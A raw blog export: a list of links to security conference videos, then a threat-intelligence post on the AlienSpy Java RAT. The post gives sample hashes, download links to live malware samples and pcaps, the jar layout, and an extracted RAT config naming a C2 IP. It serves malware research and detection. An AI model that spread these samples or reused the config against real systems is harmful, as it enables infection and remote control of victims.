<li><span style="font-family: inherit;"><span style="background-color: white; color: #222222;">2011 </span><a href="https://www.youtube.com/playlist?list=PL70E48008B3E43448" style="background-color: white; color: #1155cc;" target="_blank">https://www.youtube.com/<wbr></wbr>playlist?list=<wbr></wbr>PL70E48008B3E43448</a></span></li>
<li><span style="font-family: inherit;"><span style="background-color: white; color: #222222;">2012 </span><a href="https://www.youtube.com/playlist?list=PL1F1B29D6E0D89A5F" style="background-color: white; color: #1155cc;" target="_blank">https://www.youtube.com/<wbr></wbr>playlist?list=<wbr></wbr>PL1F1B29D6E0D89A5F</a></span></li>
<li><span style="font-family: inherit;"><span style="background-color: white; color: #222222;">2013 </span><a href="https://www.youtube.com/playlist?list=PL3UAg9Zuj1yK5nePRJCq1Y3gVLkoqVj9a" style="background-color: white; color: #1155cc;" target="_blank">https://www.youtube.com/<wbr></wbr>playlist?list=<wbr></wbr>PL3UAg9Zuj1yK5nePRJCq1Y3gVLkoq<wbr></wbr>Vj9a</a></span></li>
<li><span style="font-family: inherit;"><span style="background-color: white; color: #222222;">2014 </span><a href="https://www.youtube.com/playlist?list=PL3UAg9Zuj1yLmemIKw-domjg5UkbN-pLc" style="background-color: white; color: #1155cc;" target="_blank">https://www.youtube.com/<wbr></wbr>playlist?list=<wbr></wbr>PL3UAg9Zuj1yLmemIKw-<wbr></wbr>domjg5UkbN-pLc</a></span></li>
</ul>
<span style="font-family: inherit;"><br style="background-color: white; color: #222222;" /><b>Hack3rcon</b></span></div>
</div>
<div>
<ul style="text-align: left;">
<li><a href="http://www.irongeek.com/i.php?page=videos/hack3rcon4/mainlist"><span style="font-family: inherit;">Hack3rcon 4</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/hack3rcon3/mainlist"><span style="font-family: inherit;">Hack3rcon 3</span></a></li>
</ul>
</div>
<div>
<b><span style="font-family: inherit;">InfowarCon</span></b></div>
<div>
<ul style="text-align: left;">
<li><a href="http://infowarcon.com/iwc-2014/"><span style="font-family: inherit;">InfowarCon 2014</span></a></li>
</ul>
<div>
<b><span style="font-family: inherit;">Free and Open Source Software Conference 2014</span></b><br />
<span style="font-family: inherit;"><br /></span>
<ul>
<li><a href="http://media.ccc.de/browse/conferences/froscon/2014/"><span style="font-family: inherit;">froscon2014</span></a></li>
</ul>
<div>
<b><span style="font-family: inherit;">International Cyber Security Conference </span></b></div>
<div>
<ul style="text-align: left;">
<li><a href="https://www.youtube.com/playlist?list=PLNiWLB_wsOg5bJOBdxCCmwrEiM1jltB16"><span style="font-family: inherit;">Tel-Aviv 2014</span></a></li>
</ul>
</div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<div>
<div>
<b><span style="font-family: inherit;">KIACS Cyber Security Conference</span></b></div>
<div>
<ul>
<li><a href="https://www.youtube.com/channel/UCS7WuD-CM9O-fu2YSB2_dtw"><span style="font-family: inherit;">KIACS 2014</span></a></li>
</ul>
</div>
</div>
</div>
<div>
<b><span style="font-family: inherit;">Louisville</span></b><br />
<ul>
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm85Vyuvwqe9_dkTqBGLqnlg"><span style="font-family: inherit;">Louisville Infosec 2014</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm97OR9F0nBixmcKWrpj1CRX"><span style="font-family: inherit;">Louisville InfoSec 2013</span></a></li>
</ul>
<div>
<b><span style="font-family: inherit;">NATO Cyber Security Conference</span></b></div>
<div>
<ul style="text-align: left;">
<li><a href="https://www.youtube.com/playlist?list=PLUJbdmEnmxrJQTlDnTuMx650pLwTZeWlo"><span style="font-family: inherit;">2014</span></a></li>
</ul>
</div>
<div>
<b><span style="font-family: inherit;">Notacon</span></b></div>
<div>
<ul>
<li><a href="http://www.irongeek.com/i.php?page=videos/notacon10/mainlist"><span style="font-family: inherit;">Notacon 2013</span></a></li>
</ul>
<div>
<span style="font-family: inherit;"><span style="background-color: white; color: #222222;"><b>Nuit du Hack</b></span></span><ul style="text-align: left;">
<li><span style="font-family: inherit;"><span style="background-color: white; color: #222222;">2011 </span><a href="https://www.youtube.com/playlist?list=PL311C7F71E22EA36A" style="background-color: white; color: #1155cc;" target="_blank">https://www.youtube.com/<wbr></wbr>playlist?list=<wbr></wbr>PL311C7F71E22EA36A</a></span></li>
<li><span style="font-family: inherit;"><span style="background-color: white; color: #222222;">2012 </span><a href="https://www.youtube.com/playlist?list=PLA446F5E0B2847F06" style="background-color: white; color: #1155cc;" target="_blank">https://www.youtube.com/<wbr></wbr>playlist?list=<wbr></wbr>PLA446F5E0B2847F06</a></span></li>
<li><span style="font-family: inherit;"><span style="background-color: white; color: #222222;">2013 </span><a href="https://www.youtube.com/playlist?list=PLzGIjwtabBqjyvyt1eUdlfXg0EbcLND-8" style="background-color: white; color: #1155cc;" target="_blank">https://www.youtube.com/<wbr></wbr>playlist?list=<wbr></wbr>PLzGIjwtabBqjyvyt1eUdlfXg0EbcL<wbr></wbr>ND-8</a></span></li>
<li><span style="font-family: inherit;"><span style="background-color: white; color: #222222;">2014 </span><a href="https://www.youtube.com/playlist?list=PLzGIjwtabBqggpaJe51ZuifYYovBy3HhS" style="background-color: white; color: #1155cc;" target="_blank">https://www.youtube.com/<wbr></wbr>playlist?list=<wbr></wbr>PLzGIjwtabBqggpaJe51ZuifYYovBy<wbr></wbr>3HhS</a></span></li>
</ul>
</div>
</div>
</div>
</div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<b><span style="font-family: inherit;">Nullcon</span></b></div>
</div>
<div>
<ul style="text-align: left;">
<li><a href="http://nullcon.net/website/archives/goa-2014.php"><span style="font-family: inherit;">Nullcon 2014</span></a></li>
<li><a href="http://nullcon.net/website/archives/goa-2013.php"><span style="font-family: inherit;">Nullcon 2013</span></a></li>
<li><a href="http://nullcon.net/website/archives/delhi-2012.php"><span style="font-family: inherit;">Nullcon 2012</span></a></li>
</ul>
<div>
<b><span style="font-family: inherit;">OWASP</span></b></div>
<div>
<ul style="text-align: left;">
<li><a href="https://www.youtube.com/playlist?list=PLpr-xdpM8wG9LbN4fAtuTThCyAc4kMZYK"><span style="font-family: inherit;">OWASP Global Webinars</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLpr-xdpM8wG9lbJhvAOJrUaGXpZns7O0g"><span style="font-family: inherit;">AppSec California 2014</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLpr-xdpM8wG_KHsxepT9o6trkqDELhr3_"><span style="font-family: inherit;">AppSecEU 2014</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLpr-xdpM8wG8ODR2zWs06JkMmlRiLyBXU"><span style="font-family: inherit;">AppSecUSA 2013</span></a></li>
<li><a href="https://www.its.fh-muenster.de/owasp-appseceu13/rooms/Aussichtsreich_+_Freiraum/high_quality/"><span style="font-family: inherit;">AppSec EU Research 2013</span></a></li>
<li><a href="http://vimeo.com/appsecusa/videos"><span style="font-family: inherit;">AppSecUSA 2012</span></a></li>
<li><a href="http://2011.appsecusa.org/schedule.html#slides_video"><span style="font-family: inherit;">AppSecUSA 2011</span></a></li>
</ul>
<div>
<div>
<b><span style="font-family: inherit;">OISF</span></b></div>
<ul>
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm9QMPCFCDXuD_u05bkexOoI"><span style="font-family: inherit;">OISF 2014</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm8rtu5nHPG2L5JLxmNMlGsK"><span style="font-family: inherit;">OISF 2013</span></a></li>
</ul>
<b><span style="font-family: inherit;">OHM</span></b><br />
<ul>
<li><a href="https://archive.org/details/ohm2013"><span style="font-family: inherit;">OHM2013. Observe, Hack, Make</span></a></li>
</ul>
<div>
<div>
<b><span style="font-family: inherit;">Outerz0ne 9</span></b></div>
<div>
<ul>
<li><a href="http://www.irongeek.com/i.php?page=videos/outerz0ne9/mainlist"><span style="font-family: inherit;">2013</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/outerz0ne-2011-hacker-con"><span style="font-family: inherit;">2011</span></a></li>
</ul>
</div>
</div>
</div>
<div>
<div>
<b><span style="font-family: inherit;">Passwordscon</span></b></div>
<div>
<ul>
<li><a href="http://www.irongeek.com/i.php?page=videos/passwordscon2014/mainlist"><span style="font-family: inherit;">Passwordscon 2014</span></a></li>
</ul>
<div>
<b><span style="font-family: inherit;">PhreakNIC</span></b></div>
<div>
<ul style="text-align: left;">
<li><a href="http://www.irongeek.com/i.php?page=videos/phreaknic16/mainlist"><span style="font-family: inherit;">PhreakNIC 16</span></a></li>
</ul>
</div>
<div>
<b><span style="font-family: inherit;">RSA</span></b></div>
</div>
</div>
</div>
</div>
<div>
<ul style="text-align: left;">
<li><a href="http://www.rsaconference.com/videos"><span style="font-family: inherit;">Videos</span></a></li>
<li><a href="https://www.youtube.com/watch?v=s_8WVj8u6QI"><span style="font-family: inherit;">2014 Big data should be dead. Unisys</span></a></li>
</ul>
</div>
<b><span style="font-family: inherit;">Ruxcon</span></b><br />
<ul style="text-align: left;">
<li><a href="https://www.youtube.com/playlist?list=PLjqWRfNsaadU8YGZZbQBDFPdhgd6_1-lo"><span style="font-family: inherit;">Ruxcon 2012</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLjqWRfNsaadV1fCmwQvRJ2-IEI-6RA8Kv"><span style="font-family: inherit;">Ruxcon 2011</span></a></li>
</ul>
<b><span style="font-family: inherit;">Shmoocon</span></b><br />
<ul style="text-align: left;">
<li><span style="font-family: inherit;"><a href="https://archive.org/details/shmoocon-2014">Shmoocon 2014</a></span></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/shmoocon-firetalks-2015">Firetalks 2015</a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/shmoocon-firetalks-2014"><span style="font-family: inherit;">Firetalks 2014</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/shmoocon-firetalks-2013"><span style="font-family: inherit;">Firetalks 2013</span></a></li>
<li><span style="font-family: inherit;"><a href="http://www.irongeek.com/i.php?page=videos/shmoocon-firetalks-2011">Firetalks 2011</a></span></li>
</ul>
<div>
<b><span style="font-family: inherit;">ShowMeCon</span></b></div>
<div>
<ul style="text-align: left;">
<li><a href="http://www.irongeek.com/i.php?page=videos/showmecon2014/mainlist"><span style="font-family: inherit;">2014</span></a></li>
</ul>
<div>
<b><span style="font-family: inherit;">SkyDogCon</span></b></div>
</div>
<div>
<ul style="text-align: left;">
<li><a href="http://www.irongeek.com/i.php?page=videos/skydogcon3/mainlist"><span style="font-family: inherit;">SkyDogCon 2013</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/skydogcon2/mainlist"><span style="font-family: inherit;">SkyDogCon 2012</span></a></li>
</ul>
</div>
<div>
<b><span style="font-family: inherit;">TakeDownCon</span></b></div>
<div>
<ul style="text-align: left;">
<li><a href="http://www.irongeek.com/i.php?page=videos/takedowncon-rocketcity-2014/mainlist"><span style="font-family: inherit;">Rocket City 2014</span></a></li>
</ul>
</div>
<div>
<b><span style="font-family: inherit;">Troopers</span></b></div>
<div>
<span style="font-family: inherit;">Heidelberg Germany</span></div>
<div>
<ul style="text-align: left;">
<li><a href="https://www.youtube.com/playlist?list=PL1eoQr97VfJn89Hcf8lWp-9_f7ALxbViJ"><span style="font-family: inherit;">Troopers 2014</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PL1eoQr97VfJl1LdMzyQPz71uR6bwiUGog"><span style="font-family: inherit;">Troopers 2013</span></a></li>
<li><a href="https://www.youtube.com/watch?v=pLA91TCztNY&list=PL1eoQr97VfJmeLQYfgKAB6d0TjBgDJzFH"><span style="font-family: inherit;">Troopers 2012</span></a></li>
</ul>
<div>
<b><span style="font-family: inherit;">Virus Bulletin</span></b></div>
</div>
<ul style="text-align: left;">
<li><a href="https://www.youtube.com/user/virusbtn"><span style="font-family: inherit;"> VB2014</span></a></li>
</ul>
<div>
<b><span style="font-family: inherit;">Workshops, How-tos, and Demos</span></b><br />
<span style="font-family: inherit;"><br /></span>
<ul style="text-align: left;">
<li><a href="http://www.irongeek.com/i.php?page=videos/intro-to-tor-i2p-darknets"><span style="font-family: inherit;">Adrian Crenshaw. Intro to Darknets: Tor and I2P Workshop</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/i2p-darknet-software-in-linux"><span style="font-family: inherit;">Installing the I2P darknet software in Linux</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/installing-nessus-on-kali-linux-and-doing-a-credentialed-scan"><span style="font-family: inherit;">Adrian Crenshaw. Installing Nessus on Kali Linux and Doing a Credentialed Scan</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/intro-to-metasploit-class-at-iu-southeast"><span style="font-family: inherit;">Intro to Metasploit Class at IU Southeast</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm_EWRL30vt3xHpJx-d08Qx_"><span style="font-family: inherit;">Louisville ISSA Web PenTesting Workshop</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm9D37XW1SS-WBIpbk4NEgYI"><span style="font-family: inherit;">Louisville Nmap Class 2014</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/issa-kentuckiana-restful-web-services-jeremy-druin-webpwnized"><span style="font-family: inherit;">ISSA Kentuckiana - RESTful Web Services - Jeremy Druin - @webpwnized</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/introduction-to-html-injection-htmli-and-cross-site-scripting-xss-using-mutillidae"><span style="font-family: inherit;">Introduction to HTML Injection (HTMLi) and Cross Site Scripting (XSS) Using Mutillidae</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/introduction-to-pen-testing-simple-network-management-protocol-snmp"><span style="font-family: inherit;">Introduction to Pen Testing Simple Network Management Protocol (SNMP) - ISSA Kentuckiana workshop 9 - Jeremy Druin</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/bro-ids-and-the-bro-network-programming-language"><span style="font-family: inherit;">Liam Randall- Shmoocon 2013: Bro IDS and the Bro Network Programming Language</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/basics-of-using-sqlmap-jeremy-druin-webpwnized"><span style="font-family: inherit;">Basics of using sqlmap - ISSA Kentuckiana workshop 8 - Jeremy Druin</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/sql-server-hacking-jeremy-druin-webpwnized"><span style="font-family: inherit;">SQL Server Hacking from ISSA Kentuckiana workshop 7 - Jeremy Druin</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/introduction-to-buffer-overflows-from-issa-ky-workshop-6"><span style="font-family: inherit;">Introduction to buffer overflows from ISSA KY workshop 6 - Jeremy Druin</span></a></li>
<li><span style="font-family: inherit;">T<a href="http://www.irongeek.com/i.php?page=videos/the-potential-impact-of-software-defined-networking-on-security-brent-salisbury">he potential impact of Software Defined Networking on security - Brent Salisbury</a></span></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/intro-to-metasploit-jeremy-druin"><span style="font-family: inherit;">Into to Metasploit - Jeremy Druin</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/traceroute-and-scapy-jeremy-druin-webpwnized"><span style="font-family: inherit;">Traceroute and Scapy Jeremy Druin @webpwnized</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/basic-setup-of-security-onion-snort-snorby-barnyard-pulledpork-daemonlogger"><span style="font-family: inherit;">Basic Setup of Security-Onion: Snort, Snorby, Barnyard, PulledPork, Daemonlogger</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/networkminer-professional"><span style="font-family: inherit;">NetworkMiner Professional for Network Forensics</span></a></li>
</ul>
</div>
<i style="text-align: right;"><span style="font-family: inherit;">Special thanks to Adrian Crenshaw for his collection of videos</span></i></div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0tag:blogger.com,1999:blog-7885177434994542510.post-26983604819449837052014-11-17T16:16:00.001-05:002014-11-18T07:24:59.607-05:00AlienSpy Java RAT samples and traffic information<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoycpNgJjKtCMVreIuzvY28TMHFNY_Nv8chMIjR0zi7O3909BoZE49ThlSmlzloth_qUcHqUUBb1OPlWyQD3dI28A333sAOaKHZB4rJpMy0fIg7AoK_BgNzmDukLzM4bLt-b24BzmPdaY/s1600/jarrat.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha8hHFA6Zaz1_CvY0EOi1hOHXXB2SiMQuO6JRW0RPDQFb4rJiFnlcdNCbkEfReCF5WD7jwCXG7_EZiir3RMWrJ11MV-KA4qx0s49VTU8u6DQJP4extxkVwpx3tJO-wnFspAzo3GCguROM/s1600/ratjar.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha8hHFA6Zaz1_CvY0EOi1hOHXXB2SiMQuO6JRW0RPDQFb4rJiFnlcdNCbkEfReCF5WD7jwCXG7_EZiir3RMWrJ11MV-KA4qx0s49VTU8u6DQJP4extxkVwpx3tJO-wnFspAzo3GCguROM/s1600/ratjar.png" height="200" width="159" /></a><br />
AlienSpy Java based cross platform RAT is another reincarnation of ever popular Unrecom/Adwind and Frutas RATs that have been circulating through 2014.<br />
<br />
It appears to be used in the same campaigns as was Unrccom/Adwind - see the references. If C2 responds, the java RAT downloads Jar files containing Windows Pony/Ponik loader. The RAT is crossplatform and installs and beacons from OSX and Linux as well. However, it did not download any additional malware while running on OSX and Linux.<br />
<br />
The samples, pcaps, and traffic protocol information are available below.<br />
<br />
<br />
<a name='more'></a><br />
<br />
<div>
<div style="background-color: #618f2b; color: white; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: Courier New, Courier, monospace;"><b>File information</b></span></div>
</div>
<div>
</div>
<br />
<br />
I<br />
File: DB46ADCFAE462E7C475C171FBE66DF82_paymentadvice.jar<br />
Size: 131178<br />
MD5: DB46ADCFAE462E7C475C171FBE66DF82<br />
<br />
File: 01234.exe (Pony loader dropped by FAB8DE636D6F1EC93EEECAADE8B9BC68 - Transfer.jar_<br />
Size: 792122<br />
MD5: B5E7CD42B45F8670ADAF96BBCA5AE2D0<br />
<br />
II<br />
File: 79e9dd35aef6558461c4b93cd0c55b76_Purchase Order.jar<br />
Size: 125985<br />
MD5: 79E9DD35AEF6558461C4B93CD0C55B76<br />
<br />
III<br />
File: B2856B11FF23D35DA2C9C906C61781BA_purchaseorder.jar<br />
Size: 49084<br />
MD5: b2856b11ff23d35da2c9c906c61781ba<br />
<br />
<br />
<div style="background-color: #618f2b; color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: 'Courier New', Courier, monospace;"><b>Download</b></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"><b><br /></b></span></div>
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" imageanchor="1" style="clear: left; color: #660000; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; margin-bottom: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; font-family: 'Courier New', Courier, monospace; padding: 0px; position: relative;" /></a><a href="http://www.mediafire.com/download/0nca3agslr5s3x5/Onionduke.zip" style="color: #660000; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; text-decoration: none;">Download. Email me if you need the password</a></div>
<div>
<div>
<a href="http://www.mediafire.com/download/89gqbwjjge3p50s/Alienspy_jar_attachments-samp.zip">Original jar attachment files</a><br />
B2856B11FF23D35DA2C9C906C61781BA_purchaseorder.jar<br />
DB46ADCFAE462E7C475C171FBE66DF82_paymentadvice.jar<br />
79e9dd35aef6558461c4b93cd0c55b76_Purchase Order.jar</div>
<div>
<br /></div>
<a href="http://www.mediafire.com/download/9nd2hjo8cx65n6d/BIN_Alienspy_RAT_and_Pony_pcap.zip">Pcap files download</a><br />
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; width: 535px;">
<colgroup><col style="mso-width-alt: 19565; mso-width-source: userset; width: 401pt;" width="535"></col>
</colgroup><tbody>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt; width: 401pt;" width="535">AlienSpyRAT_B2856B11FF23D35DA2C9C906C61781BA.pcap</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">AlienSpyRAT_79E9DD35AEF6558461C4B93CD0C55B76.pcap</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">Pony_B5E7CD42B45F8670ADAF96BBCA5AE2D0.pcap</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">AlienspyRAT_DB46ADCFAE462E7C475C171FBE66DF82-OSXLion.pcap</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">AlienspyRAT_DB46ADCFAE462E7C475C171FBE66DF82-WinXP.pcap</td>
</tr>
</tbody></table>
<br />
<a href="http://www.mediafire.com/download/0w5iuwdnlj6s9bk/Alienspy_RAT_createdfiles_samp.zip">All files with created and downloaded</a><br />
<br />
<br /></div>
<div style="background-color: #618f2b; color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: 'Courier New', Courier, monospace;"><b>References</b></span></div>
<br />
Research:<br />
<a href="http://boredliner.wordpress.com/2014/02/07/cracking-obfuscated-java-code-adwind-3/">Boredliner: Cracking obfuscated java code - Adwind 3</a> << detailed java analysis<br />
<a href="http://www.fidelissecurity.com/sites/default/files/FTA_1013_RAT_in_a_jar.pdf" target="_blank">Fidelis: RAT in a jar:A phishing<span class="Apple-tab-span" style="white-space: pre;"> </span>campaign using Unrecom May 21, 2014</a><br />
<a href="http://www.crowdstrike.com/blog/adwind-rat-rebranding/index.html" target="_blank">Crowdstrike: Adwind RAT rebranding</a><a href="https://www.blogger.com/"></a><br />
<a href="http://www.symantec.com/security_response/writeup.jsp?docid=2013-070113-1904-99&tabid=2" target="_blank">Symantec:Adwind RAT</a><br />
<a href="http://www.symantec.com/connect/blogs/cross-platform-frutas-rat-builder-and-back-door" target="_blank">Symantec: Frutas RAT</a><br />
<a href="http://www.symantec.com/security_response/writeup.jsp?docid=2012-110915-5758-99&tabid=2" target="_blank">Symantec: Ponik/Pony</a><br />
<br />
<span style="background-color: white;">Java Serialization References: </span><br />
<span style="background-color: white;"><a href="https://docs.oracle.com/javase/7/docs/platform/serialization/spec/protocol.html">https://docs.oracle.com/javase/7/docs/platform/serialization/spec/protocol.html</a></span><br />
<a href="http://www.kdgregory.com/index.php?page=java.serialization">http://www.kdgregory.com/index.php?page=java.serialization</a><br />
<a href="http://staf.cs.ui.ac.id/WebKuliah/java/MasteringJavaBeans/ch11.pdf">http://staf.cs.ui.ac.id/WebKuliah/java/MasteringJavaBeans/ch11.pdf</a><br />
<div>
<br /></div>
<div>
<br /></div>
<div>
<div style="background-color: #618f2b; color: white; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: Courier New, Courier, monospace;"><b>Additional File details</b></span></div>
</div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"><b><br /></b></span></div>
<div>
<br /></div>
<div>
<b style="background-color: #d9ead3;">Alienspy RAT</b><br />
The following RAT config strings are extracted from memory dumps. Alienspy RAT is a reincarnated Unrecom/Adwind << Frutas RAT and is available from https://alienspy.net/<br />
<span style="background-color: white;">As you see by the config, it is very similar to Unrecom/Adwind</span>
<span style="background-color: white;"><br /></span>
<b>File: paymentadvice.jar</b><br />
Size: 131178<br />
<span style="background-color: white;"></span><br />
MD5: DB46ADCFAE462E7C475C171FBE66DF82<br />
───paymentadvice.jar<br />
├───META-INF<br />
│ MANIFEST.MF <<MD5: 11691d9f7d585c528ca22f7ba6f4a131 Size: 90<br />
│<br />
├───plugins<br />
│ Server.class <<MD5: 3d9ffbe03567067ae0d68124b5b7b748 Size: 520 <<<a href="http://contagioexchange.blogspot.com/2014/11/serverclass-3d9ffbe03567067ae0d68124b5b.html"> Strings are here</a><br />
│<br />
└───stub<br />
EcryptedWrapper.class <<MD5: f2701642ac72992c983cb85981a5aeb6 Size: 89870<br />
EncryptedLoader.class <<MD5: 3edfd511873b30d1373a4dc54db336ee Size: 223356<br />
EncryptedLoaderOld.class << MD5: b0ef7ff41caf69d9ae076c605653c4c7 Size: 15816<br />
stub.dll << MD5: 64fb8dfb8d25a0273081e78e7c40ca5e Size: 43648 << <a href="http://contagioexchange.blogspot.com/2014/11/stubdll-from-alienspy-rat.html">Strings are here</a><span style="background-color: white;"></span><br />
<span style="background-color: white;"><br /></span>
<br />
<b style="background-color: #d9ead3;">Alienspy Rat Config strings</b><br />
<span style="background-color: white;"><b>DB46ADCFAE462E7C475C171FBE66DF82</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd"></span><br />
<span style="font-family: Courier New, Courier, monospace;"><properties></span><br />
<span style="font-family: Courier New, Courier, monospace;"><comment>AlienSpy</comment></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="vbox">false</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="password">a2e74aef2c17329f0e8e8f347c62a6a03d16b944</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="p2">1079</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="p1">1077</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="ps_hacker">false</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="install_time">2000</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="taskmgr">false</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="connetion_time">2000</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="registryname">GKXeW0Yke7</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="wireshark">false</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="NAME">IHEAKA</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="jarname">unXX0JIhwW</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="dns"><b>204.45.207.40</b></entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="ps_explorer">false</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="msconfig">false</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="pluginfoldername">m4w6OAI02f</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="extensionname">xBQ</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="install">true</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="win_defender">false</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="uac">false</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="jarfoldername">9bor9J6cRd</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="mutex">xooJlYrm61</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="prefix">IHEAKA</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="restore_system">false</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="vmware">false</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="desktop">true</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"><entry key="reconnetion_time">2000</entry></span><br />
<span style="font-family: Courier New, Courier, monospace;"></properties></span><br />
<b><br /></b><b>IP:<span class="Apple-tab-span" style="white-space: pre;"> </span>204.45.207.40</b><br />
Decimal:<span class="Apple-tab-span" style="white-space: pre;"> </span>3425554216<br />
Hostname:<span class="Apple-tab-span" style="white-space: pre;"> </span>212.clients.instantdedis.com<br />
ISP:<span class="Apple-tab-span" style="white-space: pre;"> </span>FDCservers.net<br />
Country:<span class="Apple-tab-span" style="white-space: pre;"> </span>United States<br />
State/Region:<span class="Apple-tab-span" style="white-space: pre;"> </span>Colorado<br />
City:<span class="Apple-tab-span" style="white-space: pre;"> </span>Denver<br />
<b><br /></b>
<b><br /></b>
<b><br /></b><b>79E9DD35AEF6558461C4B93CD0C55B76</b><br />
<span style="font-family: Courier New, Courier, monospace;"><?xml version="1.0" encoding="UTF-8" standalone="no"?></span><br />
